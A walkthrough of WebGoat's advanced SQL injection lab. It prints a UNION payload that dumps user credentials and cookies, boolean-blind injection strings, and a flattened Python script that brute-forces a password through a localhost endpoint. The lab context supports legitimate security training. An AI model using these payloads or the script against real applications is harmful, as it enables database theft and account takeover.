In this walk through, we will be going through the SQL Injection (Advanced) vulnerability section from Webgoat Labs. We will be exploring and exploiting advanced SQL Injection and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
1. Pulling data from other tables
- In this challenge, we will use SQL injection payload to dump all the data from the tables.
- I used the below payload to dump the another table from the DB.
Smith' UNION SELECT userid, user_name, password, cookie, null, null, null FROM user_system_data; -- -
2. Login Bypass
- In this challenge we have to bypass authentication and login as Tom.
- On every failed attempt the application is just showing a generic error message.
- I tried the below payload in user registration functionality and got a user already exist message. That means the field is vulnerable to sql injection as it had executed our query in background and displays a true statement.
tom' AND '1'='1
- Next we tried to test if the user password starts with string t and it confirms again with the TRUE Statement.
tom' AND substring(password,1,1)='t
- After this point, i also tried using sqlmap however got no luck. So used the below script to bruteforce the password manually with the help of the above payload and true statements.
import json import requests def sql_injection_advance_5(): alphabet_index = 0 alphabet = 'abcdefghijklmnopqrstuvwxyz' password_index = 0 password = '' headers = { 'Cookie': "JSESSIONID=5g5R4McsS89BVEPZyyuVpS_dOatOzBFP6Jy6qDa8" } while True: payload = 'tom\' AND substring(password,{},1)=\'{}'.format(password_index + 1, alphabet[alphabet_index]) data = { 'username_reg': payload, 'email_reg': 'a@a', 'password_reg': 'a', 'confirm_password_reg': 'a' } r = requests.put('http://localhost/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data) try: response = json.loads(r.text) except: print("Wrong JSESSIONID, find it by looking at your requests once logged in.") return if "already exists please try to register with a different username" not in response["feedback"]: alphabet_index += 1 if alphabet_index > len(alphabet) - 1: return else: password += alphabet[alphabet_index] print(password) alphabet_index = 0 password_index += 1 sql_injection_advance_5()
- Got the password and log in to complete the challenge.
thisisasecretfortomonly
3. The Quiz
Also Read: Webgoat – Spoofing an Authentication Cookie
Conclusion:
So, we finally completed the Webgoat SQL Injection (Advanced) Vulnerability section. Next, we can mitigate these types of attacks by performing input sanitization and using prepared statements or parametrized queries for every SQL query made by the application to the database. On that note, i will take your leave and will meet you in next one with another Webgoat vulnerability writeup, till then “Keep Hacking”.